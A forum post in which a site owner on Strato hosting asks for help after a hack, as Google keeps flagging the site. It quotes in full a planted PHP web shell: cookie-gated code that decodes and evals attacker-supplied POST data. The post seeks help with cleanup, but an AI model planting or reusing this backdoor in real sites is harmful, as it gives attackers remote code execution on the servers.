hi there,
one of my sites recently got hacked on Strato, several php files with similar contents e.g.
<?php
if(!empty($_COOKIE['__mestore']) and substr($_COOKIE['__mestore'],0,16)=='3469825000034634'){if (!empty($_POST['message']) and $message=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['message']))))){echo '<textarea id=areatext>';eval($message);echo '</textarea>bg';exit;}} exit;
were placed in different asset folders. After cleaning up the installation and upgrading via the alternative method the site still gets flagged by google as "not safe". If I upgrade it again the site is good for ~1 day, then is flagged again, although I never encountered new .php files. Folders are 755 and files 644 and onbly the cache folder is on 0777 and only has the bare minimum of Snippets, Plugins & Moduls
any ideas what could be going on? anything to look after in logfiles? currently I'm totally baffled and not sure if google flags false positives or the webhost (Strato, not of any help either) has a security breach.
cheers & thanks, j